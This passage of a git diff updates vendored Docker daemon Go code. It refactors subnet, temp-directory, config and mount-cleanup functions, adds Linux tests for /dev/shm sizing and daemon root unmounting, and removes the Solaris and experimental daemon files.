+func (daemon *Daemon) Subnets() ([]net.IPNet, []net.IPNet) { + var v4Subnets []net.IPNet + var v6Subnets []net.IPNet managedNetworks := daemon.netController.Networks() for _, managedNetwork := range managedNetworks { - v4Infos, _ := managedNetwork.Info().IpamInfo() - for _, v4Info := range v4Infos { - if v4Info.IPAMData.Pool != nil { - subnets = append(subnets, *v4Info.IPAMData.Pool) + v4infos, v6infos := managedNetwork.Info().IpamInfo() + for _, info := range v4infos { + if info.IPAMData.Pool != nil { + v4Subnets = append(v4Subnets, *info.IPAMData.Pool) } } - } - - return subnets -} - -// V6Subnets returns the IPv6 subnets of networks that are managed by Docker. -func (daemon *Daemon) V6Subnets() []net.IPNet { - var subnets []net.IPNet - - managedNetworks := daemon.netController.Networks() - - for _, managedNetwork := range managedNetworks { - _, v6Infos := managedNetwork.Info().IpamInfo() - for _, v6Info := range v6Infos { - if v6Info.IPAMData.Pool != nil { - subnets = append(subnets, *v6Info.IPAMData.Pool) + for _, info := range v6infos { + if info.IPAMData.Pool != nil { + v6Subnets = append(v6Subnets, *info.IPAMData.Pool) } } } - return subnets -} - -// GraphDriverName returns the name of the graph driver used by the layer.Store -func (daemon *Daemon) GraphDriverName() string { - return daemon.layerStore.DriverName() -} - -// GetUIDGIDMaps returns the current daemon's user namespace settings -// for the full uid and gid maps which will be applied to containers -// started in this instance. -func (daemon *Daemon) GetUIDGIDMaps() ([]idtools.IDMap, []idtools.IDMap) { - return daemon.uidMaps, daemon.gidMaps + return v4Subnets, v6Subnets } -// GetRemappedUIDGID returns the current daemon's uid and gid values -// if user namespaces are in use for this daemon instance. If not -// this function will return "real" root values of 0, 0. 
-func (daemon *Daemon) GetRemappedUIDGID() (int, int) { - uid, gid, _ := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps) - return uid, gid -} - -// tempDir returns the default directory to use for temporary files. -func tempDir(rootDir string, rootUID, rootGID int) (string, error) { +// prepareTempDir prepares and returns the default directory to use +// for temporary files. +// If it doesn't exist, it is created. If it exists, its content is removed. +func prepareTempDir(rootDir string, rootIDs idtools.IDPair) (string, error) { var tmpDir string if tmpDir = os.Getenv("DOCKER_TMPDIR"); tmpDir == "" { tmpDir = filepath.Join(rootDir, "tmp") + newName := tmpDir + "-old" + if err := os.Rename(tmpDir, newName); err == nil { + go func() { + if err := os.RemoveAll(newName); err != nil { + logrus.Warnf("failed to delete old tmp directory: %s", newName) + } + }() + } else if !os.IsNotExist(err) { + logrus.Warnf("failed to rename %s for background deletion: %s. Deleting synchronously", tmpDir, err) + if err := os.RemoveAll(tmpDir); err != nil { + logrus.Warnf("failed to delete old tmp directory: %s", tmpDir) + } + } } - return tmpDir, idtools.MkdirAllAs(tmpDir, 0700, rootUID, rootGID) -} - -func (daemon *Daemon) setupInitLayer(initPath string) error { - rootUID, rootGID := daemon.GetRemappedUIDGID() - return initlayer.Setup(initPath, rootUID, rootGID) -} - -func setDefaultMtu(config *Config) { - // do nothing if the config does not have the default 0 value. - if config.Mtu != 0 { - return - } - config.Mtu = defaultNetworkMtu + // We don't remove the content of tmpdir if it's not the default, + // it may hold things that do not belong to us. 
+ return tmpDir, idtools.MkdirAllAndChown(tmpDir, 0700, rootIDs) } -func (daemon *Daemon) configureVolumes(rootUID, rootGID int) (*store.VolumeStore, error) { - volumesDriver, err := local.New(daemon.configStore.Root, rootUID, rootGID) +func (daemon *Daemon) setGenericResources(conf *config.Config) error { + genericResources, err := config.ParseGenericResources(conf.NodeGenericResources) if err != nil { - return nil, err + return err } - volumedrivers.RegisterPluginGetter(daemon.PluginStore) + daemon.genericResources = genericResources - if !volumedrivers.Register(volumesDriver, volumesDriver.Name()) { - return nil, fmt.Errorf("local volume driver could not be registered") + return nil +} + +func setDefaultMtu(conf *config.Config) { + // do nothing if the config does not have the default 0 value. + if conf.Mtu != 0 { + return } - return store.New(daemon.configStore.Root) + conf.Mtu = config.DefaultNetworkMtu } // IsShuttingDown tells whether the daemon is shutting down or not @@ -989,17 +1151,17 @@ func (daemon *Daemon) IsShuttingDown() bool { } // initDiscovery initializes the discovery watcher for this daemon. 
-func (daemon *Daemon) initDiscovery(config *Config) error { - advertise, err := parseClusterAdvertiseSettings(config.ClusterStore, config.ClusterAdvertise) +func (daemon *Daemon) initDiscovery(conf *config.Config) error { + advertise, err := config.ParseClusterAdvertiseSettings(conf.ClusterStore, conf.ClusterAdvertise) if err != nil { - if err == errDiscoveryDisabled { + if err == discovery.ErrDiscoveryDisabled { return nil } return err } - config.ClusterAdvertise = advertise - discoveryWatcher, err := initDiscovery(config.ClusterStore, config.ClusterAdvertise, config.ClusterOpts) + conf.ClusterAdvertise = advertise + discoveryWatcher, err := discovery.Init(conf.ClusterStore, conf.ClusterAdvertise, conf.ClusterOpts) if err != nil { return fmt.Errorf("discovery initialization failed (%v)", err) } @@ -1008,199 +1170,11 @@ func (daemon *Daemon) initDiscovery(config *Config) error { return nil } -// Reload reads configuration changes and modifies the -// daemon according to those changes. -// These are the settings that Reload changes: -// - Daemon labels. -// - Daemon debug log level. -// - Daemon insecure registries. -// - Daemon max concurrent downloads -// - Daemon max concurrent uploads -// - Cluster discovery (reconfigure and restart). -// - Daemon live restore -// - Daemon shutdown timeout (in seconds). -func (daemon *Daemon) Reload(config *Config) (err error) { - - daemon.configStore.reloadLock.Lock() - - attributes := daemon.platformReload(config) - - defer func() { - // we're unlocking here, because - // LogDaemonEventWithAttributes() -> SystemInfo() -> GetAllRuntimes() - // holds that lock too. 
- daemon.configStore.reloadLock.Unlock() - if err == nil { - daemon.LogDaemonEventWithAttributes("reload", attributes) - } - }() - - if err := daemon.reloadClusterDiscovery(config); err != nil { - return err - } - - if config.IsValueSet("labels") { - daemon.configStore.Labels = config.Labels - } - if config.IsValueSet("debug") { - daemon.configStore.Debug = config.Debug - } - if config.IsValueSet("insecure-registries") { - daemon.configStore.InsecureRegistries = config.InsecureRegistries - if err := daemon.RegistryService.LoadInsecureRegistries(config.InsecureRegistries); err != nil { - return err - } - } - if config.IsValueSet("live-restore") { - daemon.configStore.LiveRestoreEnabled = config.LiveRestoreEnabled - if err := daemon.containerdRemote.UpdateOptions(libcontainerd.WithLiveRestore(config.LiveRestoreEnabled)); err != nil { - return err - } - } - - // If no value is set for max-concurrent-downloads we assume it is the default value - // We always "reset" as the cost is lightweight and easy to maintain. - if config.IsValueSet("max-concurrent-downloads") && config.MaxConcurrentDownloads != nil { - *daemon.configStore.MaxConcurrentDownloads = *config.MaxConcurrentDownloads - } else { - maxConcurrentDownloads := defaultMaxConcurrentDownloads - daemon.configStore.MaxConcurrentDownloads = &maxConcurrentDownloads - } - logrus.Debugf("Reset Max Concurrent Downloads: %d", *daemon.configStore.MaxConcurrentDownloads) - if daemon.downloadManager != nil { - daemon.downloadManager.SetConcurrency(*daemon.configStore.MaxConcurrentDownloads) - } - - // If no value is set for max-concurrent-upload we assume it is the default value - // We always "reset" as the cost is lightweight and easy to maintain. 
- if config.IsValueSet("max-concurrent-uploads") && config.MaxConcurrentUploads != nil { - *daemon.configStore.MaxConcurrentUploads = *config.MaxConcurrentUploads - } else { - maxConcurrentUploads := defaultMaxConcurrentUploads - daemon.configStore.MaxConcurrentUploads = &maxConcurrentUploads - } - logrus.Debugf("Reset Max Concurrent Uploads: %d", *daemon.configStore.MaxConcurrentUploads) - if daemon.uploadManager != nil { - daemon.uploadManager.SetConcurrency(*daemon.configStore.MaxConcurrentUploads) - } - - if config.IsValueSet("shutdown-timeout") { - daemon.configStore.ShutdownTimeout = config.ShutdownTimeout - logrus.Debugf("Reset Shutdown Timeout: %d", daemon.configStore.ShutdownTimeout) - } - - // We emit daemon reload event here with updatable configurations - attributes["debug"] = fmt.Sprintf("%t", daemon.configStore.Debug) - attributes["live-restore"] = fmt.Sprintf("%t", daemon.configStore.LiveRestoreEnabled) - - if daemon.configStore.InsecureRegistries != nil { - insecureRegistries, err := json.Marshal(daemon.configStore.InsecureRegistries) - if err != nil { - return err - } - attributes["insecure-registries"] = string(insecureRegistries) - } else { - attributes["insecure-registries"] = "[]" - } - - attributes["cluster-store"] = daemon.configStore.ClusterStore - if daemon.configStore.ClusterOpts != nil { - opts, err := json.Marshal(daemon.configStore.ClusterOpts) - if err != nil { - return err - } - attributes["cluster-store-opts"] = string(opts) - } else { - attributes["cluster-store-opts"] = "{}" - } - attributes["cluster-advertise"] = daemon.configStore.ClusterAdvertise - - if daemon.configStore.Labels != nil { - labels, err := json.Marshal(daemon.configStore.Labels) - if err != nil { - return err - } - attributes["labels"] = string(labels) - } else { - attributes["labels"] = "[]" - } - - attributes["max-concurrent-downloads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentDownloads) - attributes["max-concurrent-uploads"] = fmt.Sprintf("%d", 
*daemon.configStore.MaxConcurrentUploads) - attributes["shutdown-timeout"] = fmt.Sprintf("%d", daemon.configStore.ShutdownTimeout) - - return nil -} - -func (daemon *Daemon) reloadClusterDiscovery(config *Config) error { - var err error - newAdvertise := daemon.configStore.ClusterAdvertise - newClusterStore := daemon.configStore.ClusterStore - if config.IsValueSet("cluster-advertise") { - if config.IsValueSet("cluster-store") { - newClusterStore = config.ClusterStore - } - newAdvertise, err = parseClusterAdvertiseSettings(newClusterStore, config.ClusterAdvertise) - if err != nil && err != errDiscoveryDisabled { - return err - } - } - - if daemon.clusterProvider != nil { - if err := config.isSwarmCompatible(); err != nil { - return err - } - } - - // check discovery modifications - if !modifiedDiscoverySettings(daemon.configStore, newAdvertise, newClusterStore, config.ClusterOpts) { - return nil - } - - // enable discovery for the first time if it was not previously enabled - if daemon.discoveryWatcher == nil { - discoveryWatcher, err := initDiscovery(newClusterStore, newAdvertise, config.ClusterOpts) - if err != nil { - return fmt.Errorf("discovery initialization failed (%v)", err) - } - daemon.discoveryWatcher = discoveryWatcher - } else { - if err == errDiscoveryDisabled { - // disable discovery if it was previously enabled and it's disabled now - daemon.discoveryWatcher.Stop() - } else { - // reload discovery - if err = daemon.discoveryWatcher.Reload(config.ClusterStore, newAdvertise, config.ClusterOpts); err != nil { - return err - } - } - } - - daemon.configStore.ClusterStore = newClusterStore - daemon.configStore.ClusterOpts = config.ClusterOpts - daemon.configStore.ClusterAdvertise = newAdvertise - - if daemon.netController == nil { - return nil - } - netOptions, err := daemon.networkOptions(daemon.configStore, daemon.PluginStore, nil) - if err != nil { - logrus.WithError(err).Warnf("failed to get options with network controller") - return nil - } - err = 
daemon.netController.ReloadConfiguration(netOptions...) - if err != nil { - logrus.Warnf("Failed to reload configuration with network controller: %v", err) - } - - return nil -} - -func isBridgeNetworkDisabled(config *Config) bool { - return config.bridgeConfig.Iface == disableNetworkBridge +func isBridgeNetworkDisabled(conf *config.Config) bool { + return conf.BridgeConfig.Iface == config.DisableNetworkBridge } -func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGetter, activeSandboxes map[string]interface{}) ([]nwconfig.Option, error) { +func (daemon *Daemon) networkOptions(dconfig *config.Config, pg plugingetter.PluginGetter, activeSandboxes map[string]interface{}) ([]nwconfig.Option, error) { options := []nwconfig.Option{} if dconfig == nil { return options, nil @@ -1218,7 +1192,7 @@ func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGett if strings.TrimSpace(dconfig.ClusterStore) != "" { kv := strings.Split(dconfig.ClusterStore, "://") if len(kv) != 2 { - return nil, fmt.Errorf("kv store daemon config must be of the form KV-PROVIDER://KV-URL") + return nil, errors.New("kv store daemon config must be of the form KV-PROVIDER://KV-URL") } options = append(options, nwconfig.OptionKVProvider(kv[0])) options = append(options, nwconfig.OptionKVProviderURL(kv[1])) @@ -1238,6 +1212,10 @@ func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGett options = append(options, nwconfig.OptionLabels(dconfig.Labels)) options = append(options, driverOptions(dconfig)...) 
+ if len(dconfig.NetworkConfig.DefaultAddressPools.Value()) > 0 { + options = append(options, nwconfig.OptionDefaultAddressPoolConfig(dconfig.NetworkConfig.DefaultAddressPools.Value())) + } + if daemon.configStore != nil && daemon.configStore.LiveRestoreEnabled && len(activeSandboxes) != 0 { options = append(options, nwconfig.OptionActiveSandboxes(activeSandboxes)) } @@ -1246,20 +1224,9 @@ func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGett options = append(options, nwconfig.OptionPluginGetter(pg)) } - return options, nil -} + options = append(options, nwconfig.OptionNetworkControlPlaneMTU(dconfig.NetworkControlPlaneMTU)) -func copyBlkioEntry(entries []*containerd.BlkioStatsEntry) []types.BlkioStatEntry { - out := make([]types.BlkioStatEntry, len(entries)) - for i, re := range entries { - out[i] = types.BlkioStatEntry{ - Major: re.Major, - Minor: re.Minor, - Op: re.Op, - Value: re.Value, - } - } - return out + return options, nil } // GetCluster returns the cluster @@ -1292,30 +1259,62 @@ func (daemon *Daemon) PluginGetter() *plugin.Store { } // CreateDaemonRoot creates the root for the daemon -func CreateDaemonRoot(config *Config) error { +func CreateDaemonRoot(config *config.Config) error { // get the canonical path to the Docker root directory var realRoot string if _, err := os.Stat(config.Root); err != nil && os.IsNotExist(err) { realRoot = config.Root } else { - realRoot, err = fileutils.ReadSymlinkedDirectory(config.Root) + realRoot, err = getRealPath(config.Root) if err != nil { return fmt.Errorf("Unable to get the full path to root (%s): %s", config.Root, err) } } - uidMaps, gidMaps, err := setupRemappedRoot(config) + idMappings, err := setupRemappedRoot(config) if err != nil { return err } - rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) - if err != nil { - return err + return setupDaemonRoot(config, realRoot, idMappings.RootPair()) +} + +// checkpointAndSave grabs a container lock to safely call 
container.CheckpointTo +func (daemon *Daemon) checkpointAndSave(container *container.Container) error { + container.Lock() + defer container.Unlock() + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + return fmt.Errorf("Error saving container state: %v", err) } + return nil +} - if err := setupDaemonRoot(config, realRoot, rootUID, rootGID); err != nil { - return err +// because the CLI sends a -1 when it wants to unset the swappiness value +// we need to clear it on the server side +func fixMemorySwappiness(resources *containertypes.Resources) { + if resources.MemorySwappiness != nil && *resources.MemorySwappiness == -1 { + resources.MemorySwappiness = nil } +} - return nil +// GetAttachmentStore returns current attachment store associated with the daemon +func (daemon *Daemon) GetAttachmentStore() *network.AttachmentStore { + return &daemon.attachmentStore +} + +// IDMappings returns uid/gid mappings for the builder +func (daemon *Daemon) IDMappings() *idtools.IDMappings { + return daemon.idMappings +} + +// ImageService returns the Daemon's ImageService +func (daemon *Daemon) ImageService() *images.ImageService { + return daemon.imageService +} + +// BuilderBackend returns the backend used by builder +func (daemon *Daemon) BuilderBackend() builder.Backend { + return struct { + *Daemon + *images.ImageService + }{daemon, daemon.imageService} } diff --git a/vendor/github.com/docker/docker/daemon/daemon_experimental.go b/vendor/github.com/docker/docker/daemon/daemon_experimental.go deleted file mode 100644 index fb0251d4af..0000000000 --- a/vendor/github.com/docker/docker/daemon/daemon_experimental.go +++ /dev/null @@ -1,7 +0,0 @@ -package daemon - -import "github.com/docker/docker/api/types/container" - -func (daemon *Daemon) verifyExperimentalContainerSettings(hostConfig *container.HostConfig, config *container.Config) ([]string, error) { - return nil, nil -} diff --git a/vendor/github.com/docker/docker/daemon/daemon_linux.go 
b/vendor/github.com/docker/docker/daemon/daemon_linux.go index 9bdf6e2b79..7cb6727534 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_linux.go +++ b/vendor/github.com/docker/docker/daemon/daemon_linux.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "bufio" @@ -8,10 +8,20 @@ import ( "regexp" "strings" - "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/mount" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) +// On Linux, plugins use a static path for storing execution state, +// instead of deriving path from daemon's exec-root. This is because +// plugin socket files are created here and they cannot exceed max +// path length of 108 bytes. +func getPluginExecRoot(root string) string { + return "/run/docker/plugins" +} + func (daemon *Daemon) cleanupMountsByID(id string) error { logrus.Debugf("Cleaning up old mountid %s: start.", id) f, err := os.Open("/proc/self/mountinfo") @@ -58,9 +68,41 @@ func (daemon *Daemon) cleanupMountsFromReaderByID(reader io.Reader, id string, u return nil } -// cleanupMounts umounts shm/mqueue mounts for old containers +// cleanupMounts umounts used by container resources and the daemon root mount func (daemon *Daemon) cleanupMounts() error { - return daemon.cleanupMountsByID("") + if err := daemon.cleanupMountsByID(""); err != nil { + return err + } + + info, err := mount.GetMounts(mount.SingleEntryFilter(daemon.root)) + if err != nil { + return errors.Wrap(err, "error reading mount table for cleanup") + } + + if len(info) < 1 { + // no mount found, we're done here + return nil + } + + // `info.Root` here is the root mountpoint of the passed in path (`daemon.root`). 
+ // The ony cases that need to be cleaned up is when the daemon has performed a + // `mount --bind /daemon/root /daemon/root && mount --make-shared /daemon/root` + // This is only done when the daemon is started up and `/daemon/root` is not + // already on a shared mountpoint. + if !shouldUnmountRoot(daemon.root, info[0]) { + return nil + } + + unmountFile := getUnmountOnShutdownPath(daemon.configStore) + if _, err := os.Stat(unmountFile); err != nil { + return nil + } + + logrus.WithField("mountpoint", daemon.root).Debug("unmounting daemon root") + if err := mount.Unmount(daemon.root); err != nil { + return err + } + return os.Remove(unmountFile) } func getCleanPatterns(id string) (regexps []*regexp.Regexp) { @@ -78,3 +120,14 @@ func getCleanPatterns(id string) (regexps []*regexp.Regexp) { } return } + +func getRealPath(path string) (string, error) { + return fileutils.ReadSymlinkedDirectory(path) +} + +func shouldUnmountRoot(root string, info *mount.Info) bool { + if !strings.HasSuffix(root, info.Root) { + return false + } + return hasMountinfoOption(info.Optional, sharedPropagationOption) +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_linux_test.go b/vendor/github.com/docker/docker/daemon/daemon_linux_test.go index c40b13ba4c..767925e2fb 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_linux_test.go +++ b/vendor/github.com/docker/docker/daemon/daemon_linux_test.go @@ -1,10 +1,22 @@ // +build linux -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "io/ioutil" + "os" + "path/filepath" "strings" "testing" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/oci" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) const mountsFixture = `142 78 0:38 / / rw,relatime - aufs none 
rw,si=573b861da0b3a05b,dio @@ -62,7 +74,7 @@ func TestCleanupMounts(t *testing.T) { d.cleanupMountsFromReaderByID(strings.NewReader(mountsFixture), "", unmount) if unmounted != 1 { - t.Fatalf("Expected to unmount the shm (and the shm only)") + t.Fatal("Expected to unmount the shm (and the shm only)") } } @@ -83,7 +95,7 @@ func TestCleanupMountsByID(t *testing.T) { d.cleanupMountsFromReaderByID(strings.NewReader(mountsFixture), "03ca4b49e71f1e49a41108829f4d5c70ac95934526e2af8984a1f65f1de0715d", unmount) if unmounted != 1 { - t.Fatalf("Expected to unmount the auf root (and that only)") + t.Fatal("Expected to unmount the auf root (and that only)") } } @@ -99,6 +111,212 @@ func TestNotCleanupMounts(t *testing.T) { mountInfo := `234 232 0:59 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k` d.cleanupMountsFromReaderByID(strings.NewReader(mountInfo), "", unmount) if unmounted { - t.Fatalf("Expected not to clean up /dev/shm") + t.Fatal("Expected not to clean up /dev/shm") + } +} + +// TestTmpfsDevShmSizeOverride checks that user-specified /dev/tmpfs mount +// size is not overridden by the default shmsize (that should only be used +// for default /dev/shm (as in "shareable" and "private" ipc modes). 
+// https://github.com/moby/moby/issues/35271 +func TestTmpfsDevShmSizeOverride(t *testing.T) { + size := "777m" + mnt := "/dev/shm" + + d := Daemon{ + idMappings: &idtools.IDMappings{}, + } + c := &container.Container{ + HostConfig: &containertypes.HostConfig{ + ShmSize: 48 * 1024, // size we should NOT end up with + }, + } + ms := []container.Mount{ + { + Source: "tmpfs", + Destination: mnt, + Data: "size=" + size, + }, + } + + // convert ms to spec + spec := oci.DefaultSpec() + err := setMounts(&d, &spec, c, ms) + assert.Check(t, err) + + // Check the resulting spec for the correct size + found := false + for _, m := range spec.Mounts { + if m.Destination == mnt { + for _, o := range m.Options { + if !strings.HasPrefix(o, "size=") { + continue + } + t.Logf("%+v\n", m.Options) + assert.Check(t, is.Equal("size="+size, o)) + found = true + } + } + } + if !found { + t.Fatal("/dev/shm not found in spec, or size option missing") + } +} + +func TestValidateContainerIsolationLinux(t *testing.T) { + d := Daemon{} + + _, err := d.verifyContainerSettings("linux", &containertypes.HostConfig{Isolation: containertypes.IsolationHyperV}, nil, false) + assert.Check(t, is.Error(err, "invalid isolation 'hyperv' on linux")) +} + +func TestShouldUnmountRoot(t *testing.T) { + for _, test := range []struct { + desc string + root string + info *mount.Info + expect bool + }{ + { + desc: "root is at /", + root: "/docker", + info: &mount.Info{Root: "/docker", Mountpoint: "/docker"}, + expect: true, + }, + { + desc: "root is at in a submount from `/`", + root: "/foo/docker", + info: &mount.Info{Root: "/docker", Mountpoint: "/foo/docker"}, + expect: true, + }, + { + desc: "root is mounted in from a parent mount namespace same root dir", // dind is an example of this + root: "/docker", + info: &mount.Info{Root: "/docker/volumes/1234657/_data", Mountpoint: "/docker"}, + expect: false, + }, + } { + t.Run(test.desc, func(t *testing.T) { + for _, options := range []struct { + desc string + 
Optional string + expect bool + }{ + {desc: "shared", Optional: "shared:", expect: true}, + {desc: "slave", Optional: "slave:", expect: false}, + {desc: "private", Optional: "private:", expect: false}, + } { + t.Run(options.desc, func(t *testing.T) { + expect := options.expect + if expect { + expect = test.expect + } + if test.info != nil { + test.info.Optional = options.Optional + } + assert.Check(t, is.Equal(expect, shouldUnmountRoot(test.root, test.info))) + }) + } + }) + } +} + +func checkMounted(t *testing.T, p string, expect bool) { + t.Helper() + mounted, err := mount.Mounted(p) + assert.Check(t, err) + assert.Check(t, mounted == expect, "expected %v, actual %v", expect, mounted) +} + +func TestRootMountCleanup(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") } + + t.Parallel() + + testRoot, err := ioutil.TempDir("", t.Name()) + assert.Assert(t, err) + defer os.RemoveAll(testRoot) + cfg := &config.Config{} + + err = mount.MakePrivate(testRoot) + assert.Assert(t, err) + defer mount.Unmount(testRoot) + + cfg.ExecRoot = filepath.Join(testRoot, "exec") + cfg.Root = filepath.Join(testRoot, "daemon") + + err = os.Mkdir(cfg.ExecRoot, 0755) + assert.Assert(t, err) + err = os.Mkdir(cfg.Root, 0755) + assert.Assert(t, err) + + d := &Daemon{configStore: cfg, root: cfg.Root} + unmountFile := getUnmountOnShutdownPath(cfg) + + t.Run("regular dir no mountpoint", func(t *testing.T) { + err = setupDaemonRootPropagation(cfg) + assert.Assert(t, err) + _, err = os.Stat(unmountFile) + assert.Assert(t, err) + checkMounted(t, cfg.Root, true) + + assert.Assert(t, d.cleanupMounts()) + checkMounted(t, cfg.Root, false) + + _, err = os.Stat(unmountFile) + assert.Assert(t, os.IsNotExist(err)) + }) + + t.Run("root is a private mountpoint", func(t *testing.T) { + err = mount.MakePrivate(cfg.Root) + assert.Assert(t, err) + defer mount.Unmount(cfg.Root) + + err = setupDaemonRootPropagation(cfg) + assert.Assert(t, err) + assert.Check(t, ensureShared(cfg.Root)) + + _, err = 
os.Stat(unmountFile) + assert.Assert(t, os.IsNotExist(err)) + assert.Assert(t, d.cleanupMounts()) + checkMounted(t, cfg.Root, true) + }) + + // mount is pre-configured with a shared mount + t.Run("root is a shared mountpoint", func(t *testing.T) { + err = mount.MakeShared(cfg.Root) + assert.Assert(t, err) + defer mount.Unmount(cfg.Root) + + err = setupDaemonRootPropagation(cfg) + assert.Assert(t, err) + + if _, err := os.Stat(unmountFile); err == nil { + t.Fatal("unmount file should not exist") + } + + assert.Assert(t, d.cleanupMounts()) + checkMounted(t, cfg.Root, true) + assert.Assert(t, mount.Unmount(cfg.Root)) + }) + + // does not need mount but unmount file exists from previous run + t.Run("old mount file is cleaned up on setup if not needed", func(t *testing.T) { + err = mount.MakeShared(testRoot) + assert.Assert(t, err) + defer mount.MakePrivate(testRoot) + err = ioutil.WriteFile(unmountFile, nil, 0644) + assert.Assert(t, err) + + err = setupDaemonRootPropagation(cfg) + assert.Assert(t, err) + + _, err = os.Stat(unmountFile) + assert.Check(t, os.IsNotExist(err), err) + checkMounted(t, cfg.Root, false) + assert.Assert(t, d.cleanupMounts()) + }) + } diff --git a/vendor/github.com/docker/docker/daemon/daemon_solaris.go b/vendor/github.com/docker/docker/daemon/daemon_solaris.go deleted file mode 100644 index 2b4d8d0216..0000000000 --- a/vendor/github.com/docker/docker/daemon/daemon_solaris.go +++ /dev/null @@ -1,523 +0,0 @@ -// +build solaris,cgo - -package daemon - -import ( - "fmt" - "net" - "strconv" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - containertypes "github.com/docker/docker/api/types/container" - "github.com/docker/docker/container" - "github.com/docker/docker/image" - "github.com/docker/docker/layer" - "github.com/docker/docker/pkg/idtools" - "github.com/docker/docker/pkg/parsers/kernel" - "github.com/docker/docker/pkg/sysinfo" - "github.com/docker/docker/reference" - "github.com/docker/libnetwork" - nwconfig 
"github.com/docker/libnetwork/config" - "github.com/docker/libnetwork/drivers/solaris/bridge" - "github.com/docker/libnetwork/netlabel" - "github.com/docker/libnetwork/netutils" - lntypes "github.com/docker/libnetwork/types" - "github.com/opencontainers/runc/libcontainer/label" - "github.com/opencontainers/runtime-spec/specs-go" - "github.com/pkg/errors" -) - -//#include -import "C" - -const ( - defaultVirtualSwitch = "Virtual Switch" - platformSupported = true - solarisMinCPUShares = 1 - solarisMaxCPUShares = 65535 -) - -func getMemoryResources(config containertypes.Resources) specs.CappedMemory { - memory := specs.CappedMemory{} - - if config.Memory > 0 { - memory.Physical = strconv.FormatInt(config.Memory, 10) - } - - if config.MemorySwap != 0 { - memory.Swap = strconv.FormatInt(config.MemorySwap, 10) - } - - return memory -} - -func getCPUResources(config containertypes.Resources) specs.CappedCPU { - cpu := specs.CappedCPU{} - - if config.CpusetCpus != "" { - cpu.Ncpus = config.CpusetCpus - } - - return cpu -} - -func (daemon *Daemon) cleanupMountsByID(id string) error { - return nil -} - -func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { - //Since config.SecurityOpt is specifically defined as a "List of string values to - //customize labels for MLs systems, such as SELinux" - //until we figure out how to map to Trusted Extensions - //this is being disabled for now on Solaris - var ( - labelOpts []string - err error - ) - - if len(config.SecurityOpt) > 0 { - return errors.New("Security options are not supported on Solaris") - } - - container.ProcessLabel, container.MountLabel, err = label.InitLabels(labelOpts) - return err -} - -func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) { - return nil, nil, nil -} - -func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error { - return nil -} - -func (daemon *Daemon) getLayerInit() func(string) error { - return nil -} - 
-func checkKernel() error { - // solaris can rely upon checkSystem() below, we don't skew kernel versions - return nil -} - -func (daemon *Daemon) getCgroupDriver() string { - return "" -} - -func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConfig, adjustCPUShares bool) error { - if hostConfig.CPUShares < 0 { - logrus.Warnf("Changing requested CPUShares of %d to minimum allowed of %d", hostConfig.CPUShares, solarisMinCPUShares) - hostConfig.CPUShares = solarisMinCPUShares - } else if hostConfig.CPUShares > solarisMaxCPUShares { - logrus.Warnf("Changing requested CPUShares of %d to maximum allowed of %d", hostConfig.CPUShares, solarisMaxCPUShares) - hostConfig.CPUShares = solarisMaxCPUShares - } - - if hostConfig.Memory > 0 && hostConfig.MemorySwap == 0 { - // By default, MemorySwap is set to twice the size of Memory. - hostConfig.MemorySwap = hostConfig.Memory * 2 - } - - if hostConfig.ShmSize != 0 { - hostConfig.ShmSize = container.DefaultSHMSize - } - if hostConfig.OomKillDisable == nil { - defaultOomKillDisable := false - hostConfig.OomKillDisable = &defaultOomKillDisable - } - - return nil -} - -// UsingSystemd returns true if cli option includes native.cgroupdriver=systemd -func UsingSystemd(config *Config) bool { - return false -} - -// verifyPlatformContainerSettings performs platform-specific validation of the -// hostconfig and config structures. -func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { - warnings := []string{} - sysInfo := sysinfo.New(true) - // NOTE: We do not enforce a minimum value for swap limits for zones on Solaris and - // therefore we will not do that for Docker container either. - if hostConfig.Memory > 0 && !sysInfo.MemoryLimit { - warnings = append(warnings, "Your kernel does not support memory limit capabilities. 
Limitation discarded.") - logrus.Warnf("Your kernel does not support memory limit capabilities. Limitation discarded.") - hostConfig.Memory = 0 - hostConfig.MemorySwap = -1 - } - if hostConfig.Memory > 0 && hostConfig.MemorySwap != -1 && !sysInfo.SwapLimit { - warnings = append(warnings, "Your kernel does not support swap limit capabilities, memory limited without swap.") - logrus.Warnf("Your kernel does not support swap limit capabilities, memory limited without swap.") - hostConfig.MemorySwap = -1 - } - if hostConfig.Memory > 0 && hostConfig.MemorySwap > 0 && hostConfig.MemorySwap < hostConfig.Memory { - return warnings, fmt.Errorf("Minimum memoryswap limit should be larger than memory limit, see usage.") - } - // Solaris NOTE: We allow and encourage setting the swap without setting the memory limit. - - if hostConfig.MemorySwappiness != nil && *hostConfig.MemorySwappiness != -1 && !sysInfo.MemorySwappiness { - warnings = append(warnings, "Your kernel does not support memory swappiness capabilities, memory swappiness discarded.") - logrus.Warnf("Your kernel does not support memory swappiness capabilities, memory swappiness discarded.") - hostConfig.MemorySwappiness = nil - } - if hostConfig.MemoryReservation > 0 && 